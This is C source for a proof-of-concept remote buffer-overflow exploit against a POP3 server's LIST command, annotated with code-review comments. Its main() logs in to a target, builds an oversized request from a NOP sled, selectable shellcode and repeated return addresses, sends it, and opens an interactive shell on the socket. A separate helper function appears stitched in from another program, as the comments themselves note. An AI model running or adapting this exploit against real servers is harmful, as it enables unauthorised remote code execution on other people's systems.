/*-----------------------------------------------------------------------------
  Section: Function Definitions
  ----------------------------------------------------------------------------*/

/*
 * Pull the server address, port and log flag out of the ini file, bring
 * the logger up, and open the connection.  The ini getters' return codes
 * are intentionally discarded; the only status the caller receives is
 * whatever socket_init() reports.
 *
 * NOTE(review): serverip is a file-scope buffer filled by
 * ini_get_server_ip(); neither its size nor the bound on that write is
 * visible here — confirm the getter is length-limited.
 * NOTE(review): log_on() is called with one argument here but with three
 * in main() further down; the two functions may come from different
 * programs — confirm which prototype is meant.
 */
static unsigned int connect_start(void)
{
    /* configuration first, logging second, connection last */
    (void)ini_get_server_ip(serverip);
    (void)ini_get_server_port(&port);
    (void)ini_get_log_flag(&logflag);
    (void)log_init();
    log_on(logflag);

    unsigned int sock_status = socket_init(serverip, port);
    return sock_status;
}
/*
 * Entry point of a proof-of-concept exploit for a POP3 server.  The
 * author's own comment places the target bug in pop_list.c, i.e. the
 * server's handling of the LIST command argument.  The program:
 *   1. takes <victim> <user> <password> as positionals, then options;
 *   2. resolves and connects to the victim and logs in;
 *   3. builds one oversized "list <n> " request (NOP filler, the selected
 *      shellcode, `appenders` copies of a return address, CRLF), sends
 *      it, and hands the socket to terminal().
 *
 * Defender's view: the observable artefact on the wire is a LIST command
 * whose argument is far longer than a message number and carries
 * non-printable bytes; the fix belongs in the server (bound the argument
 * length before copying it).
 *
 * Globals read or written here but declared elsewhere in the file:
 * bruteforce, victim, port, type, shellcode_num, offset, impact_place,
 * appenders, platforms[], shellcodes[], in, sock, buffer, NOP, MAX_TYPE,
 * MAX_SHELLCODE.
 *
 * Returns 0, but see the note at close(): terminal() is presumably what
 * actually ends the process.
 */
int main(int argc, char **argv)
{
    int i, next_arg = 0;
    char *progname = argv[0];
    /* message_number defaults to "1"; see the 'm' case below for why it
     * can in practice never be changed from the command line. */
    char *remote_user = NULL, *remote_passwd = NULL, *message_number = strdup("1");

    /* the three positionals are mandatory; usage() presumably does not
     * return — the code below relies on that */
    if (argc < 4)
        usage(progname);

    /* NOTE(review): sizeof((char *)&bruteforce) is the size of a pointer,
     * not of the struct, so only the first pointer-sized bytes are
     * cleared.  Inert only if bruteforce has static storage and is thus
     * already zero-initialised — confirm. */
    memset ((char *)&bruteforce, '\0', sizeof((char *)&bruteforce));
    /* consume the three positionals so getopt() only sees the options;
     * the strdup() results are unchecked (NULL on allocation failure)
     * and the (char *) casts are redundant */
    victim = (char *)strdup(argv[1]);
    argv++; argc--;
    remote_user = (char *)strdup(argv[1]);
    argv++; argc--;
    remote_passwd = (char *)strdup(argv[1]);
    argv++; argc--;

    /* atoi() reports no errors: a non-numeric value silently becomes 0
     * and passes every range check below (strtol() would catch it) */
    while ( (next_arg = getopt(argc, argv, "p:t:s:o:r:i:b")) != EOF)
        switch (next_arg) {
        case 'p':
            /* the check admits 0 although the message says "above zero" */
            if ( (atoi(optarg) < 0) || (atoi(optarg) > 65535) ) {
                fprintf (stderr, "Outrageous port-number! Stick with a number below 65535 (and above zero)\n");
                usage (progname);
            }
            port = atoi(optarg);
            printf (" -> Port set to %d.\n", port);
            break;
        case 't':
            /* bounds-checked before platforms[type] is indexed; whether
             * MAX_TYPE is the last valid index or the count is not
             * visible here — confirm */
            if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_TYPE) ) {
                fprintf (stderr, "Invalid type, should range from 0 to %d.\n", MAX_TYPE);
                usage (progname);
            }
            type = atoi(optarg);
            printf (" -> Type set to %d, %s %s.\n", type, platforms[type].platform, platforms[type].tested_on);
            break;
        case 's':
            /* same pattern as 't' for shellcodes[] and MAX_SHELLCODE */
            if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_SHELLCODE) ) {
                fprintf (stderr, "Invalid shellcode number, should range from 0 to %d.\n", MAX_SHELLCODE);
                usage (progname);
            }
            shellcode_num = atoi(optarg);
            printf (" -> Shellcode set for %s, %s.\n", shellcodes[shellcode_num].platform, shellcodes[shellcode_num].function);
            break;
        case 'o':
            /* -o/-b exclusivity is only enforced in this direction; the
             * 'b' case does not look at offset, so "-o N -b" is accepted */
            if (bruteforce.on == 1) {
                fprintf (stderr, "You cannot specify -offset and -bruteforce at the same time.\nMake up your mind!\n");
                exit (-1);
            }
            offset = atoi(optarg);
            printf (" -> Offset set to %d.\n", offset);
            break;
        case 'b':
            bruteforce.on = 1;
            printf (" -> Bruteforce mode selected (not fully implemented in this version)\n");
            printf (" -> Enter offsets seperated with a space, and a 'step' number (e.g. \"bfffffff bffff000 4\"):\n ");
            /* %x writes an unsigned int — assumes bruteforce.start/.end
             * are unsigned int fields; TODO confirm against the struct */
            if ( (fscanf (stdin, "%x %x %d", &bruteforce.start, &bruteforce.end, &bruteforce.step)) != 3) {
                fprintf (stderr, "Unknown offsets.\n");
                exit (-1);
            }
            break;
        case 'i':
            /* not range-checked here; see the strncpy() note below */
            impact_place = atoi(optarg);
            printf (" -> Place of impact set to %d.\n", impact_place);
            break;
        case 'r':
            appenders = atoi(optarg);
            printf (" -> Number of return addresses set to %d.\n", appenders);
            break;
        case 'm':
            /* NOTE(review): unreachable — 'm' is not in the option string
             * "p:t:s:o:r:i:b" above, so -m falls into default: and calls
             * usage().  If it were reached, the strdup("1") default would
             * leak. */
            message_number = strdup(optarg);
            printf ("-> Message number set to \"%.10s\".\n", message_number);
            break;
        default:
            /* getopt() returns '?' for unknown options and for a missing
             * argument; both end up here */
            fprintf (stderr, "Fictional option: '%c', please take your medication.\n", next_arg);
            usage (progname);
            break;
        }

    /* presumably resolves victim into the file-scope `in` used by
     * inet_ntoa() below — confirm */
    do_lookup();
    printf ("\nAttacking %s, a %s %s host\n", victim, platforms[type].platform, platforms[type].tested_on);
    /* -1 is assumed to be shellcode_num's file-scope initial value, i.e.
     * "no -s given" — confirm */
    if (shellcode_num != -1) {
        platforms[type].shellcode = &(shellcodes[shellcode_num]);
        printf (" - Using %s shellcode\n", shellcodes[shellcode_num].platform);
    } else
        printf (" - Using the default shellcode, %s\n", platforms[type].shellcode->platform);
    if (bruteforce.on == 0) {
        /* -o is subtracted from the platform's stored address */
        platforms[type].address -= offset;
        printf (" - Using return address %#x\n", platforms[type].address);
        printf ("\nAssembling shellspawning code\n");
    } else
        /* bruteforce.on only changes this message; the build below still
         * uses the single stored address (the author says "not fully
         * implemented") */
        printf (" - Going to bruteforce from %#x to %#x in steps of %d\n", bruteforce.start, bruteforce.end, bruteforce.step);

    printf ("-> Connecting to %s, port %d\n", inet_ntoa(in), port);
    do_connect();
    receive ();
    /* NOTE(review): connect_start() earlier in this file calls log_on()
     * with a single argument; the three-argument call here suggests the
     * two functions come from different programs — confirm the
     * prototype. */
    log_on (remote_user, remote_passwd, sock);

    /* build the request: "list <n> " + NOP filler + shellcode + return
     * addresses + CRLF.  buffer's size is not visible here; %.10s keeps
     * the message number itself bounded. */
    memset (buffer, '\0', sizeof(buffer));
    sprintf (buffer, "list %.10s ", message_number); //the bug lies in pop_list.c
    /* Author's note: the '%s' is there to allow values such as '0001', so
     * the length of <nops>+<shellcode>+<ret> can be adjusted
     * (theoretically ;) */
#ifdef DEBUG
    /* sizeof/strlen yield size_t but are printed with %d — a format/
     * argument mismatch (UB); %zu is the matching specifier */
    printf ("Step 1, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
    /* fill everything after the command with NOP, keeping the final byte
     * NUL so strlen() stays bounded for the appends below */
    memset (buffer+strlen(buffer), NOP, sizeof(buffer)-strlen(buffer)-1);
#ifdef DEBUG
    printf ("Step 2, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
    /* NOTE(review): neither the destination offset (impact_place minus the
     * shellcode length) nor the unsigned length expression is validated
     * against sizeof(buffer); an out-of-range -i value makes this write
     * outside buffer.  An earlier, different length expression was left
     * commented out here by the author. */
    strncpy (buffer + impact_place - strlen(platforms[type].shellcode->code), platforms[type].shellcode->code, sizeof(buffer) - impact_place - 5 - 1);
#ifdef DEBUG
    printf ("Step 3, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
    /* append `appenders` raw copies of the address after the current
     * string end; strlen() is recomputed on every iteration.  (A
     * byte-by-byte version of this copy was left commented out by the
     * author.) */
    i = 0;
    while (i < appenders) {
        memcpy ((char *)&buffer + strlen(buffer), &platforms[type].address, 4);
#ifdef HARDCORE
        printf ("-> sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
        i++;
    }
    /* CRLF terminates the POP3 command line; strcpy() adds the NUL */
    strcpy (buffer + strlen(buffer), "\x0d\x0a"); // \x00 gets appended automatically
#ifdef HARDCORE
    /* hex dump of the request; i is int compared with size_t, and a
     * signed char prints sign-extended for bytes >= 0x80 */
    printf ("Code is:\n\033[1;31m");
    for (i = 0; i < strlen(buffer); i++)
        printf ("%02x ", buffer[i]);
    printf ("\033[0;37m\n");
#endif
    transmit (buffer);
    receive ();
    printf ("Got shell!\n");
    /* terminal() presumably relays the socket until it closes and does
     * not return — hence the author's "not reached" */
    terminal (sock);
    close (sock); //not reached
    return (0);
}